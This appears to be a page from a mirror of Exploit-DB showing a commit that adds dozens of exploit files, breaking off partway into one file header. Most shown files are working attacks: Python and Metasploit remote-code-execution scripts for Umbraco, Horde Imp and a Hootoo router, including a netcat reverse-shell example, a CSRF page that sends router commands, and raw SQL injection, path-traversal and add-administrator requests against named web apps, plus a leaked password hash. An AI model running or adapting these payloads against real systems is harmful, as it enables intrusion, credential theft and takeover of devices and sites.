bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-01-15

Browse source 
32 changes to exploits/shellcodes

xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation
Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation
Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation
Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass
Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation
Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation
Microsoft Windows 10 - COM Desktop Broker Privilege Escalation

Hootoo HT-05 - Remote Code Execution (Metasploit)
Across DR-810 ROM-0 - Backup File Disclosure
i-doit CMDB 1.12 - Arbitrary File Download
i-doit CMDB 1.12 - SQL Injection
Horde Imp - 'imap_open' Remote Command Execution
Modern POS 1.3 - Arbitrary File Download
Modern POS 1.3 - SQL Injection
Twilio WEB To Fax Machine System Application 1.0 - SQL Injection
Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin)
Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection
Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection
Find a Place CMS Directory 1.5 - SQL Injection
Cleanto 5.0 - SQL Injection
Lenovo R2105 - Cross-Site Request Forgery (Command Execution)
HealthNode Hospital Management System 1.0 - SQL Injection
Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)
ThinkPHP 5.X - Remote Command Execution
Real Estate Custom Script 2.0 - SQL Injection
Job Portal Platform 1.0 - SQL Injection
Umbraco CMS 7.12.4 - Authenticated Remote Code Execution
Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection
Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection
AudioCode 400HD - Command Injection
This commit is contained in:
Offensive Security 2019-01-15 05:01:52 +00:00
parent 0495dc483e
commit 518c704a2f
33 changed files with 2346 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

63
exploits/aspx/webapps/46153.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests;
from bs4 import BeautifulSoup;
def print_dict(dico):
print(dico.items());
print("Start");
# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';
login = "XXXX;
password="XXXX";
host = "XXXX";
# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);
# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);
# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);
soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);
print("End");

66
exploits/cgi/webapps/46164.txt Normal file
View file

@ -0,0 +1,66 @@
# [CVE-2018-10093] Remote command injection vulnerability in AudioCode IP phones
## Description
The AudioCodes 400HD series of IP phones consists in a range of
easy-to-use, feature-rich desktop devices for the service provider
hosted services, enterprise IP telephony and contact center markets.
The CGI scripts used on the 420HD phone (web interface) do not filter
user inputs correctly. Consequently, an authenticated attacker could
inject arbitrary commands (Remote Code Execution) and take full control
over the device. For example, it is possible to intercept live
communications.
## Vulnerability records
**CVE ID**: CVE-2018-10093
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-78
**CVSS Base Score**: 7.2
**CVSS Vector String**:
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
## Details
The script `command.cgi`, used for system monitoring and diagnostics, is
vulnerable to a remote command execution attack.
Visiting the `/command.cgi?cat%20/etc/passwd` gives the following result:
```
admin:$1$FZ6rOGS1$54ZXSmjh7nod.kXFRyLx70:0:0:root:/:/bin/sh
```
Note that the vulnerable page is only available to authenticated users
(in possession of the admin configuration password).
## Timeline (dd/mm/yyyy)
* 06/03/2018 : Initial discovery
* 17/04/2018 : Vendor contact
* 17/05/2018 : Vendor technical team aknowledgment
* 07/01/2019 : Vendor recommendation to mitigate the issue
* 10/01/2019 : Public disclosure
## Fixes
AudioCodes recommends to change the default admin credentials to
mitigate the issue.
## Affected versions
Theses vulnerabilities have only been tested on the 420HD phone
(firmware version: 2.2.12.126).
## Credits
a.baube at sysdream dot com

82
exploits/hardware/remote/46143.rb Executable file
View file

@ -0,0 +1,82 @@
require 'msf/core'
require 'net/http'
require "uri"
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
#
#Descrizione del Exploit
#
def initialize(info = {})
super(update_info(info,
'Name' => 'Hootoo HT-05 remote shell exploit',
'Description' => %q{
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
This exploit was written by Andrei Manole. Version of the frimware 2.000.022. Tested on 2.00.0.82 -> it still works
},
'Author' => 'Andrei Manole',
'References' =>
[
],
'Privileged' => true,
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
}, #fine del settaggio del payload
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => "20 Dicembre 2018",
'DefaultTarget' => 0))
register_options([ Opt::RPORT(6666) ], self.class)
end
def send_request(host,port) #funzione di invio
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
if response.code == 200 || response.message == 'OK' || response.class.name == 'HTTPOK' then
return true
end
return false
end
def exploit #exploit
print_status("[+] Apertura backdoor in corso...")
if !send_request(datastore['RHOST'],datastore['RPORT']) then #controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.
raise("[-] Errore nel apertura della porta")
end
print_good("[+] Richiesta inviata con successo! :)")
nsock = self.connect(false, {"RPORT" => datastore['RPORT']}) rescue nil #inizio a fare la conessione
print_good("[+] Porta aperta con successo ! :)")
nsock.put(payload.encoded + " >/dev/null 2>&1") #passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.
handler(nsock)
return
end
end
Sent with [ProtonMail](https://protonmail.com) Secure Email.

32
exploits/hardware/webapps/46132.txt Normal file
View file

@ -0,0 +1,32 @@
#Exploit Title: Across DR-810 ROM-0 Backup - File Disclosure(Sensitive Information)
#Date: 2019-01-11
#Exploit Author: SajjadBnd
#My Email: blackwolf@post.com
#Vendor Homepage: http://www.ac.i8i.ir/
#Version: DR-810
#Tested on: DR-810
#RomPager/4.07 UPnP/1.0
[+] About
==========
this hardware is a SIM card modem , This modem is being installed in Iran and sold with the SIM card
i8i.ir An internet site that sells products like SIM-card modems This modem has sold countless And on the main page of the site wrote:
SIM modems are used in a variety of ways and for similar uses, and depending on the features and quality, they have a variety of prices.
In this site, you will be familiar with the five modem and router sim-modem groups, which you can consult with us to choose the best option for you, and choose one of them.
[+] Rom-0 Backup File Disclosure
=================================
A dangerous vulnerability present on many network devices which are using
RomPager.The rom-0 file contains sensitive information such as the router password.
There is a disclosure in which anyone can download that file without any authentication by
a simple GET request.
[+] POC
========
just add /rom-0 to your target address
rom-0 Backup File will be downloaded
http://target/rom-0
then you can Decompressed the file and get password

47
exploits/hardware/webapps/46147.py Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: Lenovo R2105 Remote Code Execution through CSRF
# Date: 01/14/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Version: 1.0
# Tested on: Windows 10 x64
# Note: The administrator who opens the URL should be authenticated.
import socket
server_ip = "0.0.0.0"
server_port = 80
router_ip = "192.168.11.1"
command = "reboot"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
print "Currently listening at " + server_ip + ":" + str(server_port)
client, (client_host, client_port) = sock.accept()
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
<body>
<form method="post" id="frmcmd" name="frmSetup" action="http://""" + router_ip + """/goform/SystemCommand">
<input name="command" value=""" + command + """ type="hidden">
<input name="SystemCommandSubmit" value="Apply" type="hidden">
</form>
<script>
document.getElementById("frmcmd").submit();
</script>
</body>
</html>
""")
client.close()
sock.close()

40
exploits/php/webapps/46133.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: i-doit CMDB 1.12 - Arbitrary File Download
# Dork: N/A
# Date: 2019-01-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.i-doit.org/
# Software Link: https://netcologne.dl.sourceforge.net/project/i-doit/i-doit/1.12/idoit-open-1.12.zip
# Version: 1.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?file_manager=image&file=[FILE]
# Users..
#
GET /[PATH]/index.php?file_manager=image&file=src/config.inc.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=h6qbu3jsemq9en8c3epiri8323
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 17:30:16 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Sat, 12 Jan 2019 19:30:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
i-doit-Authorized: 1
Last-Modified: Sat, 12 Jan 2019 17:30:17 GMT
Content-Length: 1282
Content-Disposition: inline; filename="src/config.inc.php"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

38
exploits/php/webapps/46134.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: i-doit CMDB 1.12 - SQL Injection
# Dork: N/A
# Date: 2019-01-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.i-doit.org/
# Software Link: https://netcologne.dl.sourceforge.net/project/i-doit/i-doit/1.12/idoit-open-1.12.zip
# Version: 1.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/?objGroupID=[SQL]
# Users..
#
GET /[PATH]/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=h6qbu3jsemq9en8c3epiri8323
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 16:47:58 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
i-doit-Authorized: 1
X-i-doit-Notification-0: {"message":"Database error : Query error: 'SELECT DISTINCT(isys_obj_type_group__const) FROM isys_obj_type\r\n\t\t\tINNER JOIN isys_obj_type_group ON isys_obj_type_group__id = isys_obj_type__isys_obj_type_group__id WHERE isys_obj_type_group__status = 2 AND isys_obj_type_group__id = '12'||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||'' ORDER BY isys_obj_type_group__sort, isys_obj_type_group__const ASC LIMIT 0,1':\nDuplicate entry ' : admin@localhostidoit_data10.1.21-MariaDB11' for key 'group_key'\n","type":2,"options":{"sticky":true,"width":"400px","header":""}}
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

74
exploits/php/webapps/46136.py Executable file
View file

@ -0,0 +1,74 @@
# Exploit Title: Horde Imp Unauthenticated Remote Command Execution
# Google Dork: inurl:/imp/login.php
# Date: 10/01/2019
# Exploit Author: Paolo Serracino - Pietro Minniti - Damiano Proietti
# Vendor Homepage: https://www.horde.org/apps/imp/
# Software Link: https://www.horde.org/download/imp
# Version: All IMP versions
# Tested on: Debian/Ubuntu
import requests
import sys
import base64
import random
import string
'''
--------------------------------------------------------------------------------------------
| Paolo Serracino - Pietro Minniti - Damiano Proietti - @OmnitechIT |
| Horde Imp Unauthenticated Command Execution via imap_open function in exposed debug page |
--------------------------------------------------------------------------------------------
Horde Imp, an application that comes with the Horde GroupWare/Webmail suite exposes an unauthenticated debug page with a form
that permits IMAP requests to arbitrary hosts. The page is at http://horde_path/imp/test.php and should be deleted after installation.
Leveraging the CVE 2018-19518 and no input sanitization is possible to execute shell commands.
Tested on Debian/Ubuntu.
'''
def check(target):
try:
res_check = requests.get(target)
if 'PHP Mail Server Support Test' in res_check.text and 'PHP Major Version: 5.' in res_check.text:
print("[+] Target is most likely vulnerable")
return True
else:
print("[-] Target doesn't look vulnerable")
sys.exit()
except requests.exceptions.RequestException as e:
print("[-] Connection Issue")
def exploit(target,cmd):
cmd= base64.b64encode(cmd)
payload1 = random.choice(string.ascii_letters)
new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
'Referer':target,
'Cookie':'Horde=klstwo9u52kw7iqy4i22i0iok1;auth_key=klstwo9u52kw7iqy4i22i0iok1;imp_key=klstwo9u52kw7iqy4i22i0iok1;'
})
res = requests.post(target,headers=new_headers,data=[('server',payload1 + ' -oProxyCommand=echo$IFS$()' + cmd + '|base64$IFS$()-d|sh}'), #in order to avoid url encoding by requests
('port','143'),
('user','a'),
('passwd','a'),
('server_type','imap'),
('f_submit','Submit')
])
print('[+] Sent!')
if(len(sys.argv)) < 3:
print("[+] First argument is the path of target's Horde test.php and second the payload as a shell command")
print('[+] Enclose shell commands between double quotes')
print('[+] example python horde_imap_cmd.py http://127.0.0.1/horde/imp/test.php "mknod /tmp/bk p; nc 192.168.1.17 443 0</tmp/bk | /bin/bash 1>/tmp/bk"')
sys.exit()
target = sys.argv[1] #+ '/imp/test.php'
cmd = sys.argv[2]
if check(target):
exploit(target,cmd)

55
exploits/php/webapps/46137.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: Modern POS 1.3 - Arbitrary File Download
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://itsolution24.com/
# Software Link: https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
#
GET /[PATH]/_inc/bridges/php-local/index.php?action=download&path=../../../config.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 23:29:12 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Content-Disposition: attachment; filename="config.php"
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 2920
Content-Type: text/x-php;charset=UTF-8
GET /[PATH]/_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 23:34:27 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Content-Disposition: attachment; filename="environ"
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 0
Content-Type: inode/x-empty

35
exploits/php/webapps/46138.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Modern POS 1.3 - SQL Injection
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://itsolution24.com/
# Software Link: https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/_inc/pos.php?query_string=[SQL]&category_id=&field=[SQL]&action_type=PRODUCTLIST
#
GET /[PATH]/_inc/pos.php?query_string=Efe%27||(/*!11111SElecT*/+%27Efe%27+/*!11111FRom*/+/*!11111DuAl*/+/*!11111whERE*/+6=6+/*!11111anD*/+(/*!11111SEleCT*/+6+/*!11111FRoM*/(/*!11111SELECT*/+COuNT(*),/*!11111CONCAT*/(@@verSion,(/*!11111seleCT*/+(ELT(6=6,1))),/*!11111FLoOR*/(RAnD(0)*2))x+/*!11111FRoM*/+/*!12345InFOrMaTION_SchEmA.plUgINS*/+/*!11111grOUP*/+/*!11111by*/+x)a))||%27&action_type=PRODUCTLIST HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 422 Unprocessable Entity
Date: Sat, 12 Jan 2019 23:25:05 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: application/json; charset=UTF-8

84
exploits/php/webapps/46139.txt Normal file
View file

@ -0,0 +1,84 @@
# Exploit Title: Fax Machine System Application 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ranksol.com/
# Software Link: https://codecanyon.net/item/twilio-web-to-fax-machine-system-application-php-script/22139608
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/login_check.php
#
#07 header("Location:login.php");
#08 }else{
#09 $email = $_POST['email'];
#10 $password = $_POST['password'];
#11 $sql = "SELECT * FROM user WHERE email = '$email' AND password = '$password'";
#12 $result = $conn->query($sql);
#13 $counts = mysqli_num_rows($result);
#14 if($counts > 0){
POST /[PATH]/login_check.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
email=1&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&submit=Login: undefined
HTTP/1.1 302 Found
Date: Sun, 13 Jan 2019 13:24:24 GMT
Server: Apache
X-Powered-By: PHP/7.1.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Location: dashboard.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/add_email.php?id=[SQL]
#
#46 $sel = "select `id`, `number` from subscribers where id = '".$_REQUEST['id']."'";
#47 $exe = @mysqli_query($conn,$sel);
#48 $row = @mysqli_fetch_assoc($exe);
#49 $subscriber_number = $row['number'];
GET /[PATH]/add_email.php?id=-34%27%20union%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2019 13:34:31 GMT
Server: Apache
X-Powered-By: PHP/7.1.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

170
exploits/php/webapps/46140.txt Normal file
View file

@ -0,0 +1,170 @@
# Exploit Title: Live Call Support 1.5 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ranksol.com/
# Software Link: https://codecanyon.net/item/live-call-support-widget-software-online-calling-web-application/22532799
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/server.php
#
#/[PATH]/server.php
#213 case "save_user":{
#214
#215 if($_REQUEST['password']==$_REQUEST['confirm_password']){
#216
#217 if($_REQUEST['uid']==''){
#218
#219 $sql = "insert into users
#220
#221 (
#222
#223 name,
#224
#225 phone_number,
#226
#227 email,
#228
#229 password,
#230
#231 type
#232
#233 )
#234
#235 values
#236
#237 (
#238
#239 '".$_REQUEST['agent_name']."',
#240
#241 '".$_REQUEST['agent_number']."',
#242
#243 '".$_REQUEST['email_address']."',
#244
#245 '".$_REQUEST['password']."',
#246
#247 '".$_REQUEST['role']."'
#248
#249 )";
#250
#251 }else{
#252
#253 $sql = "update users set
POST /[PATH]/server.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------16460805410548
Content-Length: 879
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------16460805410548: undefined
Content-Disposition: form-data; name="agent_name"
efeefe
-----------------------------16460805410548
Content-Disposition: form-data; name="agent_number"
1234
-----------------------------16460805410548
Content-Disposition: form-data; name="email_address"
efe@omerefe.com
-----------------------------16460805410548
Content-Disposition: form-data; name="role"
1
-----------------------------16460805410548
Content-Disposition: form-data; name="password"
efeefe
-----------------------------16460805410548
Content-Disposition: form-data; name="confirm_password"
efeefe
-----------------------------16460805410548
Content-Disposition: form-data; name="uid"
-----------------------------16460805410548
Content-Disposition: form-data; name="cmd"
save_user
-----------------------------16460805410548--
HTTP/1.1 302 Found
Date: Sun, 13 Jan 2019 11:45:08 GMT
Server: Apache
X-Powered-By: PHP/7.1.25
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
location: users.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/server.php
#
<html>
<body>
<form method="post" action="http://localhost/[PATH]/server.php" enctype="multipart/form-data">
<div class="form-group">
<label>Name</label>
<input name="agent_name" value="" type="text">
</div>
<div class="form-group">
<label>Phone Number</label>
<input name="agent_number" value="" type="text">
</div>
<div class="form-group">
<label>Email Address</label>
<input name="email_address" value="" type="text">
</div>
<div class="form-group">
<label>Role</label>
<select name="role" class="form-control">
<option value="2">Consultant</option>
<option value="1">Admin</option>
</select>
</div>
<div class="form-group">
<label>Password</label>
<input name="password" value="" type="text">
</div>
<div class="form-group">
<label>Confirm Password</label>
<input name="confirm_password" type="text">
</div>
<div class="form-group">
<input name="uid" value="" type="hidden">
<input name="cmd" value="save_user" type="hidden">
<input value="Save" class="btn btn-primary" type="submit">
<input value="Back" class="btn btn-default" onclick="history.go(-1)" type="button">
</div>
</form>
</body>
</html>
# POC:
# 3)
# http://localhost/[PATH]/server.php?cmd=delete_user&userID=[DELETE_ID]
#
#/[PATH]/server.php
#191 case "delete_user":{
#192
#193 $userID = $_REQUEST['userID'];
#194
#195 $res = mysqli_query($link,"delete from users where id='".$userID."'");
#196
#197 if($res){

134
exploits/php/webapps/46141.txt Normal file
View file

@ -0,0 +1,134 @@
# Exploit Title: Live Call Support 1.5 - Remote Code Execution / SQL Injection
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ranksol.com/
# Software Link: https://codecanyon.net/item/live-call-support-widget-software-online-calling-web-application/22532799
# Version: 1.5
